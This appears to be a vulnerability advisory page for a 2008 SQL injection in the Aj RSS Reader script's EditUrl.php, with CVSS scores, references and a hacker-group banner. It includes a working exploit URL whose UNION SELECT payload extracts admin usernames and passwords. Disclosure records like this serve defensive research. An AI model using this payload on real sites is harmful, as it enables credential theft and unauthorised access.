Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability

2008.10.29
Credit: yassine_enp
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M S N N N A A K K E S T E A A M M M SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M ===================================================SNAKES TEAM==================================================== + = = AJ Forced Matrix Script Remote SQL Injection Vulnerability + + = ==============================================:::ALGERIAN HaCkEr:::=============================================== = = = = = = Discovered By: yassine_enp :::ALGERIAN HaCkEr::: = = = = = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = = = = = :::::Mail: e1np@hotmail.com::::::: = = = = = = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::= = = nome de script :rss_reader = ======================================yassine_enp=================================== Exploit(1): ******** www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin-- =================================================================================================================== Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members =================================================================================================================== ::::e1np@Hotmail.CoM::::

References:

http://xforce.iss.net/xforce/xfdb/46088
http://www.securityfocus.com/bid/31910
http://www.milw0rm.com/exploits/6829


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top